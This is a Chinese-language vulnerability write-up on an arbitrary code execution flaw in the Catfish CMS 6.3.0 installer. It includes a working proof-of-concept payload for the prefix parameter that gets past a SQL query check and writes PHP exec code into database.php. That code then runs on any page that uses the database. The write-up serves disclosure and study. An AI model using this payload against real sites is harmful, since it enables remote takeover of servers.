Catfish任意代码执行漏洞 0day
Catfish任意代码执行漏洞
漏洞影响
Catfish6.3.0
复现过程
漏洞位置:application\install\controller\Index.php step3()
在该函数中会将我们传入的内容替换database.php中的数据
我们来看下该文件
这么一看会发现很简单,是不是只要post 传入prefix=','a'=>exec('calc')]?>
之类的的就可以成功写入里面呢,但是经过断点跟踪发下存在一些问题。
在此之前会进行一个查询,如果我们传prefix=','a'=>exec('calc')]?>
,那么最终的查询语句就是select * from ','a'=>exec('calc')]?>posts where id=1
很明显会sql语法错误,所以为了绕过这个地方需要加些东西,我们只要保证能查出数据即可。
所以我们可以传
prefix=information_schema.schemata%23','a'=>exec('calc')]?>
这样拼接的sql语句为select * from information_schema.schemata%23','a'=>exec('calc')]?>>posts where id=1
#后面的会被注释掉,所以最终执行的sql语句为select * from information_schema.schemata
。成功达到查出数据的目的。
在安装的过程抓包修改post参数如下。
接着我们来看下本地的database.php文件
可以看到成功写入。
剩下的就简单了,因为是数据库配置文件,所以任何调用数据库的地方都会触发,比如首页。
Catfish任意代码执行漏洞 0day相关推荐
- HP officejet、PageWide打印机任意代码执行漏洞cve-2017-2741 Tenable发布漏洞检测插件...
打印机无处不在.在企业,在家里,在学校,但你在做网络安全评估的时候是否考虑过他们?你上一次更新打印机固件是什么时候?您是否知道您的打印机有公共漏洞?Tenable安全公司进行了研究,并发布了漏洞检测 ...
- php 168任意代码执行漏洞之php的Complex (curly) syntax
今天了解了php 168的任意代码执行漏洞,Poc: http://192.168.6.128/pentest/cms/php168/member/post.php ?only=1 &show ...
- thinkphp日志泄漏漏洞_ThinkPHP框架任意代码执行漏洞的利用及其修复方法
ThinkPHP是国内著名的开源的PHP框架,是为了简化企业级应用开发和敏捷WEB应用开发而诞生的.最早诞生于2006年初,原名FCS,2007年元旦正式更名为ThinkPHP,并且遵循Apache2 ...
- 基于qtc++设计文本编辑器的代码_文本编辑器Vim/Neovim被曝任意代码执行漏洞,Notepad:兄弟等你好久了...
犹记前些日子,微软的记事本文本编辑器爆出了本地代码执行漏洞. Google Project Zero研究员Tavis Ormandy宣布在微软的记事本文本编辑器中发现代码执行漏洞. 可以看见,他在no ...
- Apple任意代码执行漏洞
报告编号:B6-2021-072701 报告来源:360CERT 报告作者:360CERT 更新日期:2021-07-27 0x01 漏洞简述 2021年07月27日,360CERT监测发现Apple ...
- 记一次海洋cms任意代码执行漏洞拿shell(url一句话)
实验环境:海洋CMS6.54(后续版本已该洞已补) 1.后台登录尝试 这个站点是个测试站,站里没什么数据. 进入admin.php,是带验证码的后台登录系统,没有验证码的可以用bp爆破.有验证码的也有 ...
- Apache Log4j任意代码执行漏洞安全风险通告第三次更新
奇安信CERT 致力于第一时间为企业级用户提供安全风险通告和有效解决方案. 风险通告 近日,奇安信CERT监测到Apache Log4j存在任意代码执行漏洞.经过分析,该组件存在Java JNDI注入 ...
- Nette框架未授权任意代码执行漏洞分析
Nette框架未授权任意代码执行漏洞分析 漏洞介绍: Nette Framework 是个强大,基于组件的事件驱动 PHP 框架,用来创建 web 应用.Nette Framework 是个现代化风格 ...
- 文本编辑器Vim/Neovim被曝任意代码执行漏洞,Notepad:兄弟等你好久了
犹记前些日子,微软的记事本文本编辑器爆出了本地代码执行漏洞. Google Project Zero研究员Tavis Ormandy宣布在微软的记事本文本编辑器中发现代码执行漏洞. 可以看见,他在no ...
- 绿盟科技网络安全威胁周报2017.11 关注Apache Struts2 任意代码执行漏洞 CVE-2017-5638...
绿盟科技发布了本周安全通告,周报编号NSFOCUS-17-11,绿盟科技漏洞库本周新增136条,其中高危63条.本次周报建议大家关注 Apache Struts2 任意代码执行漏洞 CVE-2017- ...
最新文章
- 一堂拯救万千股民的公开课
- 从零开始学电脑办公_从零开始学办公软件之办公软件介绍
- python写一个游戏多少代码-使用Python写一个贪吃蛇游戏实例代码
- Synchronize对String加锁
- Windows中CMD启动应用
- 代码同步工具_可以多重连接的数据库管理工具
- 可以无限量服用的药材
- mysql suoyin 和锁_mysql 索引和锁
- android 线程池 怎么用,android中的线程池 怎么用
- SQLSERVER 清除链接历史记录
- js获取html中type属性,JavaScript获取节点类型、节点名称和节点值
- 大话设计模式笔记(十二)の抽象工厂模式
- 图画日记怎么画_小学生绘画日记
- 背包九讲——全篇详细理解与代码实现
- web前端优化--图片优化
- 测试网页版淘宝购物车
- 在wps里面怎么设置触发器_wps如何制作触发器
- B站网页视频加速设置
- CentOS 安装与配置
- 更新vetur和vscode版本后,vetur失效,代码全白
热门文章
- 2020华为外包机试题目
- jQuery 选择城市,显示对应的即时时区时间
- Struts2详细执行流程自己总结
- 机器学习中的数学(八):卡方分布(Chi-squared Distribution) t分布(T Distribution)F分布(T Distribution)
- mysql alter字段_mysql alter语句添加、修改、删除字段的例子
- 我的Java传承名单(不知为何以前的又没有了,幸亏有备份才可以又贴出来)
- 二行代码解决全部网页木马(含iframe/script木马)
- centos7安装Memcached
- 快速原型工具,帮你从0开始画原型图!
- Python办公——根据Excel数据批量生成二维码